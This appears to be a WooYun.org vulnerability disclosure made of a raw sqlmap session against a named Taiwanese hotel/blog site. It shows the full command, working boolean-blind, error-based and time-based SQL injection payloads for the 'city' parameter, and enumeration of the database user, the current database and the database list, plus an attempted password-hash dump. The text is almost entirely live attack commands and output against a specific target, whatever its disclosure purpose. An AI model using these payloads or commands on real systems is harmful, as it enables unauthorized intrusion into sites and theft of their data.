WooYun.org

[root@Hacker~]# Sqlmap sqlmap.py -u "http://chi.gogoblog.tw/hotels_city.php?city=kaohsiung&Page=1&p=new" --dbs --passwords --current-user --current-db --is-dba
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and fede
[*] starting at 13:53:53
[13:53:53] [INFO] resuming back-end DBMS 'mysql'
[13:53:53] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: city
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: city=kaohsiung' AND 3934=3934 AND 'uvNB'='uvNB&Page=1&p=new
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: city=kaohsiung' AND (SELECT 9431 FROM(SELECT COUNT(*),CONCAT(0x716c626571,(SELECT (CASE WHEN (9431=9431) THEN 1 ELSE 0 END)),0x717a746971,FLOOR(RAND(0)*2))x FROM INFORM
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: city=kaohsiung' AND SLEEP(5) AND 'NMSk'='NMSk&Page=1&p=new
---
[13:53:54] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[13:53:54] [INFO] fetching current user
[13:53:54] [INFO] resumed: chiblog@%
current user:    'chiblog@%'
[13:53:54] [INFO] fetching current database
[13:53:54] [INFO] resumed: chiblog
current database:    'chiblog'
[13:53:54] [INFO] testing if current user is DBA
[13:53:54] [INFO] fetching current user
[13:53:54] [INFO] heuristics detected web page charset 'utf-8'
current user is DBA:    False
[13:53:54] [INFO] fetching database users password hashes
[13:53:54] [WARNING] the SQL query provided does not return any output
[13:53:54] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[13:53:54] [INFO] fetching database users
[13:53:54] [INFO] the SQL query used returns 1 entries
[13:53:54] [INFO] resumed: 'chiblog'@'%'
[13:53:54] [INFO] fetching number of password hashes for user 'chiblog'
[13:53:54] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:53:54] [INFO] retrieved:
[13:53:55] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[13:54:04] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[13:54:04] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
[13:54:04] [WARNING] unable to retrieve the number of password hashes for user 'chiblog'
[13:54:04] [ERROR] unable to retrieve the password hashes for the database users (most probably because the session user has no read privileges over the relevant system database tab
[13:54:04] [INFO] fetching database names
[13:54:04] [INFO] the SQL query used returns 2 entries
[13:54:04] [INFO] resumed: information_schema
[13:54:04] [INFO] resumed: chiblog
available databases [2]:
[*] chiblog
[*] information_schema
[13:54:04] [INFO] fetched data logged to text files under 'E:\INJECT~1\SQLMAP~1.4\Bin\output\chi.gogoblog.tw'